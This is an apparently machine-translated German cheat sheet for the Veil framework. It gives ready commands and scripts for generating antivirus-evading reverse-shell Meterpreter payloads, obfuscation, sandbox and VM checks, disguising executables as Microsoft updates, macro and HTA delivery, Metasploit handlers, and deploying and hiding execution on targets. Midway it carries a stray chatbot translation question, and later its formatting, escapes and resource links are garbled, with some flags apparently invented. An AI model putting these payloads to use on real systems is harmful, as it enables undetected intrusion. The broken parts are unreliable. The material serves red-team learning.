Veil Cheat Sheet (Cheat Sheet für Veil)¶
Überblick¶
Veil ist ein Tool, das entwickelt wurde, um Metasploit-Payloads zu generieren, die gängige Antivirenlösungen umgehen. Es ist Teil des Veil-Frameworks und konzentriert sich auf Payload-Generierung und -Kodierung, um die Erkennung durch Antivirensoftware und Endpoint-Schutzsysteme zu vermeiden. Veil unterstützt mehrere Programmiersprachen und Kodierungstechniken, um unerkennbare Payloads für Penetrationstests und Red-Team-Operationen zu erstellen.
⚠️ Warnung: Verwenden Sie Veil nur in Umgebungen, die Ihnen gehören oder für die Sie eine ausdrückliche Erlaubnis zum Testen haben. Unbefugte Nutzung kann gegen Nutzungsbedingungen oder lokale Gesetze verstoßen. Dieses Tool ist ausschließlich für legitime Sicherheitstests vorgesehen.
Installation¶
Automatische Installation¶
# Clone the repository
git clone https://github.com/Veil-Framework/Veil.git
cd Veil
# Run the setup script
sudo ./config/setup.sh --force --silent
# Verify installation
./Veil.py --version
Manuelle Installation¶
# Install dependencies
sudo apt update
sudo apt install -y python3 python3-pip git
# Install Python dependencies
pip3 install pycrypto
pip3 install distorm3
pip3 install pefile
pip3 install capstone
# Install additional tools
sudo apt install -y mingw-w64
sudo apt install -y mono-mcs
sudo apt install -y golang-go
# Clone Veil
git clone https://github.com/Veil-Framework/Veil.git
cd Veil
# Make executable
chmod +x Veil.py
Docker-Installation¶
# Pull Docker image
docker pull mattiasohlsson/veil
# Run Veil in Docker
docker run -it --rm -v $(pwd):/output mattiasohlsson/veil
# Create alias for easier usage
echo 'alias veil="docker run -it --rm -v $(pwd):/output mattiasohlsson/veil"' >> ~/.bashrc
source ~/.bashrc
Kali Linux Installation¶
# Veil is pre-installed on Kali Linux
veil
# If not installed, install via apt
sudo apt update
sudo apt install veil
# Update to latest version
cd /usr/share/veil
sudo git pull
Grundlegende Nutzung¶
Interaktiver Modus¶
# Start Veil in interactive mode
./Veil.py
# Or if installed system-wide
veil
# Navigate the menu system
# 1) Veil-Evasion (payload generation)
# 2) Veil-Ordnance (payload delivery)
Befehlszeilenmodus¶
# List available payloads
./Veil.py -t Evasion --list-payloads
# Generate payload with specific options
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# Generate payload with custom options
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-dir /tmp/payloads
# Show payload options
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --payload-options
Payload-Generierung¶
Python-Payloads¶
# Python reverse TCP Meterpreter
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# Python reverse HTTP Meterpreter
./Veil.py -t Evasion -p python/meterpreter/rev_http --ip 192.168.1.100 --port 80
# Python reverse HTTPS Meterpreter
./Veil.py -t Evasion -p python/meterpreter/rev_https --ip 192.168.1.100 --port 443
# Python shell reverse TCP
./Veil.py -t Evasion -p python/shellcode_inject/flat --ip 192.168.1.100 --port 4444
# Python with custom encoding
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encoding base64
C#-Payloads¶
# C# reverse TCP Meterpreter
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# C# reverse HTTP Meterpreter
./Veil.py -t Evasion -p cs/meterpreter/rev_http --ip 192.168.1.100 --port 80
# C# reverse HTTPS Meterpreter
./Veil.py -t Evasion -p cs/meterpreter/rev_https --ip 192.168.1.100 --port 443
# C# shellcode injection
./Veil.py -t Evasion -p cs/shellcode_inject/virtual --ip 192.168.1.100 --port 4444
# C# with process hollowing
./Veil.py -t Evasion -p cs/shellcode_inject/hollow --ip 192.168.1.100 --port 4444
PowerShell-Payloads¶
# PowerShell reverse TCP
./Veil.py -t Evasion -p powershell/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# PowerShell reverse HTTP
./Veil.py -t Evasion -p powershell/meterpreter/rev_http --ip 192.168.1.100 --port 80
# PowerShell reverse HTTPS
./Veil.py -t Evasion -p powershell/meterpreter/rev_https --ip 192.168.1.100 --port 443
# PowerShell with obfuscation
./Veil.py -t Evasion -p powershell/shellcode_inject/psexec --ip 192.168.1.100 --port 4444
Go-Payloads¶
# Go reverse TCP
./Veil.py -t Evasion -p go/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# Go reverse HTTP
./Veil.py -t Evasion -p go/meterpreter/rev_http --ip 192.168.1.100 --port 80
# Go reverse HTTPS
./Veil.py -t Evasion -p go/meterpreter/rev_https --ip 192.168.1.100 --port 443
# Go with custom user agent
./Veil.py -t Evasion -p go/meterpreter/rev_http --ip 192.168.1.100 --port 80 --user-agent "Mozilla/5.0"
Fortgeschrittene Umgehungstechniken¶
Kodierung und Obfuskation¶
# Base64 encoding
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encoding base64
# XOR encoding
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encoding xor
# AES encryption
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encryption aes
# Multiple encoding layers
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encoding base64,xor
# Custom encoding key
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encoding-key "MySecretKey123"
Anti-Analyse-Techniken¶
# Sleep before execution
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --sleep 30
# Check for virtual machine
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --vm-check
# Check for debugger
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --debug-check
# Domain check
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --domain-check
# Process check
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --process-check
Benutzerdefinierte Payload-Optionen¶
# Custom executable icon
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --icon /path/to/icon.ico
# Custom executable version info
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --version-info "Microsoft Corporation"
# Custom file description
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --file-description "System Update"
# Custom product name
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --product-name "Windows Update"
# Compile as service
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --service
Payload-Bereitstellungsmethoden¶
Ausführbare Datei-Generierung¶
# Generate Windows executable
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-type exe
# Generate DLL
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-type dll
# Generate service executable
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-type service
# Generate shellcode
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-type shellcode
# Generate PowerShell script
./Veil.py -t Evasion -p powershell/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-type ps1
Ordnance (Payload-Bereitstellung)¶
# Start Veil-Ordnance
./Veil.py -t Ordnance
# Generate HTA payload
./Veil.py -t Ordnance -p hta/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# Generate macro payload
./Veil.py -t Ordnance -p macro/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# Generate SCT payload
./Veil.py -t Ordnance -p sct/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# Generate JavaScript payload
./Veil.py -t Ordnance -p js/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
Integration mit Metasploit¶
Handler-Einrichtung¶
# Start Metasploit handler for Veil payload
msfconsole -q -x "
use exploit/multi/handler;
set payload windows/meterpreter/reverse_tcp;
set LHOST 192.168.1.100;
set LPORT 4444;
set ExitOnSession false;
exploit -j"
# Handler for HTTP payload
msfconsole -q -x "
use exploit/multi/handler;
set payload windows/meterpreter/reverse_http;
set LHOST 192.168.1.100;
set LPORT 80;
exploit -j"
# Handler for HTTPS payload
msfconsole -q -x "
use exploit/multi/handler;
set payload windows/meterpreter/reverse_https;
set LHOST 192.168.1.100;
set LPORT 443;
exploit -j"
Ressourcen-Skripte¶
# Create Metasploit resource script
cat > veil_handler.rc << 'EOF'
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
set ExitOnSession false
exploit -j
EOF
# Use resource script
msfconsole -r veil_handler.rc
# Multi-handler resource script
cat > multi_handler.rc ``<< 'EOF'
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
set ExitOnSession false
exploit -j
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set LHOST 192.168.1.100
set LPORT 80
set ExitOnSession false
exploit -j
EOF
Automatisierungsskripte¶
Batch-Payload-Generierung¶
#!/bin/bash
# Generate multiple Veil payloads
LHOST="192.168.1.100"
OUTPUT_DIR="veil_payloads_$(date +%Y%m%d_%H%M%S)"
mkdir -p "$OUTPUT_DIR"
# Array of payload configurations
declare -a PAYLOADS=(
"python/meterpreter/rev_tcp:4444:python_tcp"
"python/meterpreter/rev_http:80:python_http"
"cs/meterpreter/rev_tcp:4445:cs_tcp"
"cs/meterpreter/rev_http:8080:cs_http"
"powershell/meterpreter/rev_tcp:4446:ps_tcp"
"go/meterpreter/rev_tcp:4447:go_tcp"
)
echo "[+] Generating Veil payloads..."
echo "[+] LHOST: $LHOST"
echo "[+] Output directory: $OUTPUT_DIR"
for payload_config in "$\\\{PAYLOADS[@]\\\}"; do
IFS=':' read -r payload port name <<< "$payload_config"
echo "[+] Generating $name ($payload:$port)"
./Veil.py -t Evasion \
-p "$payload" \
--ip "$LHOST" \
--port "$port" \
--output-dir "$OUTPUT_DIR" \
--output-name "$name" \
--force
if [ $? -eq 0 ]; then
echo " ✓ Success: $name"
else
echo " ✗ Failed: $name"
fi
done
echo "[+] Payload generation completed"
echo "[+] Generated files:"
ls -la "$OUTPUT_DIR"
# Generate Metasploit resource script
cat >`` "$OUTPUT_DIR/handlers.rc" << EOF
# Metasploit handlers for generated payloads
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST $LHOST
set LPORT 4444
set ExitOnSession false
exploit -j
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set LHOST $LHOST
set LPORT 80
set ExitOnSession false
exploit -j
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST $LHOST
set LPORT 4445
set ExitOnSession false
exploit -j
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set LHOST $LHOST
set LPORT 8080
set ExitOnSession false
exploit -j
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST $LHOST
set LPORT 4446
set ExitOnSession false
exploit -j
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST $LHOST
set LPORT 4447
set ExitOnSession false
exploit -j
EOF
echo "[+] Metasploit resource script created: $OUTPUT_DIR/handlers.rc"
Payload-Testskript¶
Would you like me to translate the remaining empty sections as well?```bash
!/bin/bash¶
Test generated payloads against antivirus¶
PAYLOAD_DIR="$1" VIRUSTOTAL_API_KEY="your_api_key_here"
if [ -z "$PAYLOAD_DIR" ]; then
echo "Usage: $0
if [ ! -d "$PAYLOAD_DIR" ]; then echo "Error: Directory not found: $PAYLOAD_DIR" exit 1 fi
echo "[+] Testing payloads in: $PAYLOAD_DIR"
Function to upload to VirusTotal¶
upload_to_vt() \\{ local file="\(1" local filename=\)(basename "$file")
echo "[+] Uploading $filename to VirusTotal..."
response=$(curl -s -X POST \
-H "x-apikey: $VIRUSTOTAL_API_KEY" \
-F "file=@$file" \
"https://www.virustotal.com/api/v3/files")
if [ $? -eq 0 ]; then
scan_id=$(echo "$response"|jq -r '.data.id')
echo " Scan ID: $scan_id"
echo "$filename:$scan_id" >> "$PAYLOAD_DIR/vt_scans.txt"
else
echo " Upload failed"
fi
\\}
Function to check scan results¶
check_vt_results() \\{ local scan_id="\(1" local filename="\)2"
echo "[+] Checking results for $filename..."
response=$(curl -s -X GET \
-H "x-apikey: $VIRUSTOTAL_API_KEY" \
"https://www.virustotal.com/api/v3/analyses/$scan_id")
if [ $? -eq 0 ]; then
status=$(echo "$response"|jq -r '.data.attributes.status')
if [ "$status" = "completed" ]; then
stats=$(echo "$response"|jq -r '.data.attributes.stats')
malicious=$(echo "$stats"|jq -r '.malicious')
suspicious=$(echo "$stats"|jq -r '.suspicious')
undetected=$(echo "$stats"|jq -r '.undetected')
echo " Status: $status"
echo " Malicious: $malicious"
echo " Suspicious: $suspicious"
echo " Undetected: $undetected"
echo "$filename,$malicious,$suspicious,$undetected" >> "$PAYLOAD_DIR/detection_results.csv"
else
echo " Status: $status (still processing)"
fi
else
echo " Failed to get results"
fi
\\}
Upload all executables¶
echo "[+] Uploading payloads..." for file in "\(PAYLOAD_DIR"/*.exe; do if [ -f "\)file" ]; then upload_to_vt "$file" sleep 15 # Rate limiting fi done
echo "[+] Waiting for scans to complete..." sleep 300 # Wait 5 minutes
Check results¶
if [ -f "\(PAYLOAD_DIR/vt_scans.txt" ]; then echo "filename,malicious,suspicious,undetected" > "\)PAYLOAD_DIR/detection_results.csv"
while IFS=':' read -r filename scan_id; do
check_vt_results "$scan_id" "$filename"
sleep 15 # Rate limiting
done < "$PAYLOAD_DIR/vt_scans.txt"
echo "[+] Results saved to: $PAYLOAD_DIR/detection_results.csv"
else
echo "[-] No scans to check"
fi
### Payload-Bereitstellungsskriptbash
!/bin/bash¶
Deploy Veil payloads for testing¶
PAYLOAD_DIR="\(1" TARGET_HOST="\)2" TARGET_USER="$3"
if [ $# -ne 3 ]; then
echo "Usage: $0
echo "[+] Deploying payloads to $TARGET_HOST"
Create remote directory¶
ssh "\(TARGET_USER@\)TARGET_HOST" "mkdir -p /tmp/test_payloads"
Copy payloads¶
for file in "\(PAYLOAD_DIR"/*.exe; do if [ -f "\)file" ]; then filename=\((basename "\)file") echo "[+] Copying $filename..."
scp "$file" "$TARGET_USER@$TARGET_HOST:/tmp/test_payloads/"
if [ $? -eq 0 ]; then
echo " ✓ Copied successfully"
else
echo " ✗ Copy failed"
fi
fi
done
Create execution script¶
cat > /tmp/execute_payloads.ps1 << 'EOF'
PowerShell script to execute payloads¶
$payloadDir = "C:\tmp\test_payloads" \(logFile = "\)payloadDir\execution_log.txt"
Get-ChildItem -Path $payloadDir -Filter "*.exe"|ForEach-Object \\{
$payload = $_.FullName
$timestamp = Get-Date -Format "yyyy-MM-dd HH
ss"
Write-Host "[+] Executing: $($_.Name)"
Add-Content -Path $logFile -Value "$timestamp - Executing: $($_.Name)"
try \\\\{
Start-Process -FilePath $payload -WindowStyle Hidden
Add-Content -Path $logFile -Value "$timestamp - Success: $($_.Name)"
\\\\}
catch \\\\{
Add-Content -Path $logFile -Value "$timestamp - Failed: $($_.Name) - $($_.Exception.Message)"
\\\\}
Start-Sleep -Seconds 5
\\} EOF
Copy execution script¶
scp /tmp/execute_payloads.ps1 "\(TARGET_USER@\)TARGET_HOST:/tmp/test_payloads/"
echo "[+] Deployment completed" echo "[+] To execute payloads on target:" echo " ssh \(TARGET_USER@\)TARGET_HOST" echo " powershell -ExecutionPolicy Bypass -File /tmp/test_payloads/execute_payloads.ps1"
rm /tmp/execute_payloads.ps1
## Ausweichungstestsbash
Test against Windows Defender¶
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --av-test defender
Test against multiple AV engines¶
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --av-test all
Generate report¶
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --av-report
Custom AV testing¶
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --av-engines "defender,kaspersky,norton"
### Sandbox-Ausweichungbash
Generate payload with sandbox evasion¶
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp \ --ip 192.168.1.100 \ --port 4444 \ --sandbox-evasion \ --sleep 60 \ --vm-check \ --debug-check
Time-based evasion¶
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp \ --ip 192.168.1.100 \ --port 4444 \ --time-check \ --execution-delay 300
Environment checks¶
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp \
--ip 192.168.1.100 \
--port 4444 \
--domain-check \
--process-check \
--file-check
## Fehlerbehebungbash
Fix missing dependencies¶
sudo apt update sudo apt install -y python3-dev python3-pip pip3 install --upgrade pip
Fix Wine issues (for Windows compilation)¶
sudo dpkg --add-architecture i386 sudo apt update sudo apt install wine32
Fix MinGW issues¶
sudo apt install mingw-w64-i686-dev mingw-w64-x86-64-dev
Reinstall Veil¶
cd Veil
sudo ./config/setup.sh --force
### Häufige Problemebash
Check compiler availability¶
which i686-w64-mingw32-gcc which x86_64-w64-mingw32-gcc
Fix C# compilation¶
sudo apt install mono-mcs mono-complete
Fix Go compilation¶
export GOPATH=/usr/share/veil/go export PATH=$PATH:/usr/local/go/bin
Debug compilation¶
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --debug
#### Installationsproblemebash
Test payload generation¶
./Veil.py -t Evasion --list-payloads|grep meterpreter
Check payload options¶
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --payload-options
Verify output¶
file /var/lib/veil/output/compiled/payload.exe strings /var/lib/veil/output/compiled/payload.exe|grep -i meterpreter
Test payload execution¶
wine /var/lib/veil/output/compiled/payload.exe
#### Kompilierungsfehlerbash
Enable debug mode¶
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --debug
Check Veil logs¶
tail -f /var/lib/veil/output/veil.log
Verbose output¶
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --verbose
Check compilation output¶
cat /var/lib/veil/output/source/payload.cs ```#### Payload-Probleme https://github.com/Veil-Framework/Veil##
Debugging und Logging¶
https://veil-framework.github.io/Veil/#
Ressourcen¶
https://www.metasploit.com/- Offizielles Veil-Frameworkhttps://www.offensive-security.com/metasploit-unleashed/- Veil-Dokumentationhttps://owasp.org/www-community/attacks/Code_Injection- [Metasploit-Framework](